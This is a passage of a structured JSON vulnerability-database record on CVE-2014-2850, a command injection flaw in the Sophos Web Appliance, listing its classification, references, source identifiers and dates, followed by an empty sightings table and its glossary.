"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "120230",
"trust": 0.8,
"url": "http://www.sophos.com/en-us/support/knowledgebase/120230.aspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70789"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"db": "NVD",
"id": "CVE-2014-2850"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/66734"
},
{
"trust": 1.7,
"url": "http://www.sophos.com/en-us/support/knowledgebase/120230.aspx"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/32789"
},
{
"trust": 1.7,
"url": "http://www.zerodayinitiative.com/advisories/zdi-14-069/"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/57706"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2850"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2850"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-14-069/\u0027]"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70789"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"db": "PACKETSTORM",
"id": "126099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-158"
},
{
"db": "NVD",
"id": "CVE-2014-2850"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-70789"
},
{
"db": "BID",
"id": "66734"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"db": "PACKETSTORM",
"id": "126099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-158"
},
{
"db": "NVD",
"id": "CVE-2014-2850"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-70789"
},
{
"date": "2014-04-08T00:00:00",
"db": "BID",
"id": "66734"
},
{
"date": "2014-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"date": "2014-04-09T23:53:40",
"db": "PACKETSTORM",
"id": "126099"
},
{
"date": "2014-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-158"
},
{
"date": "2014-04-11T15:55:27.693000",
"db": "NVD",
"id": "CVE-2014-2850"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-14T00:00:00",
"db": "VULHUB",
"id": "VHN-70789"
},
{
"date": "2014-04-17T01:09:00",
"db": "BID",
"id": "66734"
},
{
"date": "2014-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002001"
},
{
"date": "2014-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-158"
},
{
"date": "2024-11-21T02:07:03.210000",
"db": "NVD",
"id": "CVE-2014-2850"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "126099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-158"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sophos Web Appliance Arbitrary command execution vulnerability in the network interface settings page",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002001"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-158"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…